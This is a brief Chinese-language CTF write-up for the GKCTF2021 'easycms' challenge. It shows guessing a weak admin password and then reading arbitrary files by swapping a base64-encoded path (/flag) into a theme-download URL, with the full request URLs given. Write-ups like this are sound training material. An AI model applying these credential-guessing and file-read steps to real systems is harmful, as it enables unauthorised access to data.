[GKCTF2021]easycms

扫到admin.php

官方提示了，后台密码为5位数字的，

盲猜账号admin密码12345

登录到后台

点击：设计->导出主题->保存

然后复制下载的主题的链接

http://caf73c4b-734b-495b-b898-dc46661beb7f.node4.buuoj.cn/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=

看到一串base64编码

进行解码：

猜测可能存在任意文件下载，将/flagbase64编码(L2ZsYWc=)加入到url中

http://caf73c4b-734b-495b-b898-dc46661beb7f.node4.buuoj.cn/admin.php?m=ui&f=downloadtheme&theme=L2ZsYWc=

拿到flag.zip文件，修改后缀为txt打开拿到flag

题目中还有很多的目录穿透点，我就不一一复现了。